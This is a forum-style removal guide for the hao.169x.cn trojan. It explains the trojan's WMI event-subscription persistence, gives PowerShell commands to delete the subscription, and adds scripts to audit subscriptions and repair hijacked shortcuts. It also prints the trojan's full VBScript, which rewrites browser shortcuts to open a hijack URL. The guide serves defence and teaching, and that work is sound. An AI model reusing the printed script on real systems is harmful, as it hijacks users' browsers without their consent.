
HAO.169x.cn Virus removal.

Hello!
After fighting with this nasty trojan I finally found a solution.

The trojan persists as a permanent WMI event subscription in Windows: an interval timer, an event filter, an ActiveScript event consumer and the binding that ties the filter to the consumer (the four objects the removal commands below delete).

The consumer executes a VBScript that looks like this:


On Error Resume Next
Const link = "http://hao.169x.cn/?v=108&m=yx"
Const link360 = "http://hao.169x.cn/?v=108&m=yx&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = Split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next
lnkpathsArr = Split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
    If fso.FolderExists(oFolder) Then
      For Each file In fso.GetFolder(oFolder).Files
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                Set oShellLink = WshShell.CreateShortcut(file.Path)
                path = oShellLink.TargetPath
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                If oDic.Exists(LCase(name)) Then
                  If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arguments = link360
                  Else
                        oShellLink.Arguments = link
                  End If
                  If file.Attributes And 1 Then
                        file.Attributes = file.Attributes - 1
                  End If
                  oShellLink.Save
                End If
            End If
      Next
    End If
Next
Removing it is quite simple:

Run PowerShell as administrator and issue these four commands:


gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject
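To verify that the four commands worked, and to spot any similar persistence, it helps to list every permanent WMI event subscription rather than query for the known names only. The following is an added example, not part of the original post: it enumerates filters, consumers (all subclasses, including ActiveScriptEventConsumer), bindings and interval timers in root/subscription (the namespace where permanent subscriptions normally live) and in root/cimv2 (where this trojan registered its objects), and prints what each one does. The property names used are the standard WMI ones; the output layout is this example's own.

```powershell
# Added example, not from the original post: enumerate permanent WMI event
# subscriptions so the Remove-WmiObject commands above can be verified and
# similar persistence found. Requires an elevated PowerShell session.
$namespaces = 'root/subscription', 'root/cimv2'
$classes    = '__EventFilter', '__EventConsumer', '__FilterToConsumerBinding', '__IntervalTimerInstruction'

$found = foreach ($ns in $namespaces) {
    foreach ($class in $classes) {
        # SilentlyContinue: a namespace may not define every class or may hold no instances
        Get-WmiObject -Namespace $ns -Class $class -ErrorAction SilentlyContinue | ForEach-Object {
            $obj = $_
            # Each object type identifies itself through a different property
            $id = switch ($obj.__CLASS) {
                '__EventFilter'              { $obj.Name }
                '__FilterToConsumerBinding'  { "$($obj.Filter) -> $($obj.Consumer)" }
                '__IntervalTimerInstruction' { "$($obj.TimerId) every $($obj.IntervalBetweenEvents) ms" }
                default                      { $obj.Name }   # consumer subclasses all carry Name
            }
            # What the object does: the WQL query, the script body, or the command line
            $detail = if ($obj.Query) { $obj.Query } elseif ($obj.ScriptText) { $obj.ScriptText -replace '\s+', ' ' } elseif ($obj.CommandLineTemplate) { $obj.CommandLineTemplate } else { '' }
            if ($detail.Length -gt 120) { $detail = $detail.Substring(0, 120) + '...' }
            [pscustomobject]@{
                Namespace = $ns
                Class     = $obj.__CLASS
                Id        = $id
                Detail    = $detail
            }
        }
    }
}

$found | Format-Table -AutoSize -Wrap

# Anything still named VBScriptKids_* means one of the removal commands failed.
# Any ActiveScriptEventConsumer or CommandLineEventConsumer you did not create
# yourself deserves a close look at its Detail column.
$found | Where-Object { $_.Id -like '*VBScriptKids*' }
```

On a clean machine root/subscription usually contains only a handful of built-in entries (for example the SCM event log consumer), so a script consumer whose Detail column shows VBScript that rewrites shortcuts stands out immediately.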


P.S.
The trojan has been found bundled with many software packages, including KMS10.
You should remove that software too.
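Deleting the subscription stops the script from running again, but the shortcuts it already modified keep the hao.169x.cn URL in their Arguments until someone clears it. The following is an added example, not part of the original post: it scans the folders and browser names taken from the VBScript above, reports every shortcut whose arguments carry a URL (and every browser shortcut with any arguments at all), and clears the hijacked ones when run with -Fix. It assumes the hard-coded C:\Users\shome paths in the script stand for the current user's profile, scans subfolders too (the script only read each folder's top level), and the -Fix switch and output format are this example's own.

```powershell
# Added example, not from the original post: find shortcuts whose Arguments
# were rewritten to a URL by the VBScript above, and clear them with -Fix.
# Run it AFTER removing the WMI subscription, or the timer re-hijacks them.
param([switch]$Fix)

# Browser list taken from the script (the duplicate empty entry dropped)
$browsers = '114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe'.Split(',')

# Folder list from the script, with the hard-coded "shome" profile replaced
# by the current user's (assumption: the script was generated per machine)
$folders = @(
    'C:\Users\Public\Desktop',
    'C:\ProgramData\Microsoft\Windows\Start Menu\Programs',
    "$env:USERPROFILE\Desktop",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs"
)

# Same COM object the script used, so the same .lnk fields are read and written
$shell = New-Object -ComObject WScript.Shell

$hits = foreach ($folder in $folders) {
    if (-not (Test-Path -LiteralPath $folder)) { continue }
    foreach ($file in Get-ChildItem -LiteralPath $folder -Filter *.lnk -File -Recurse -Force -ErrorAction SilentlyContinue) {
        $lnk = $shell.CreateShortcut($file.FullName)
        $target = [System.IO.Path]::GetFileName($lnk.TargetPath).ToLowerInvariant()
        $isBrowser = $browsers -contains $target
        $hasUrl = $lnk.Arguments -match 'https?://'
        # Report hijacked shortcuts, plus browser shortcuts with any arguments
        # so a legitimate profile switch can be told apart from a hijack
        if (-not ($hasUrl -or ($isBrowser -and $lnk.Arguments -ne ''))) { continue }
        [pscustomobject]@{
            Shortcut  = $file.FullName
            Target    = $lnk.TargetPath
            Arguments = $lnk.Arguments
            Hijacked  = $hasUrl
        }
        if ($Fix -and $hasUrl) {
            # The script cleared the read-only bit before saving; do the same so Save() succeeds
            if ($file.IsReadOnly) { $file.IsReadOnly = $false }
            $lnk.Arguments = ''
            $lnk.Save()
        }
    }
}

$hits | Format-Table -AutoSize -Wrap
```

Save it under any name, say Find-HijackedShortcuts.ps1 (a name chosen for this example), run it once to review the report, then run it again with -Fix. Only entries whose Hijacked column is True are modified; a browser shortcut carrying a non-URL argument is left alone.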

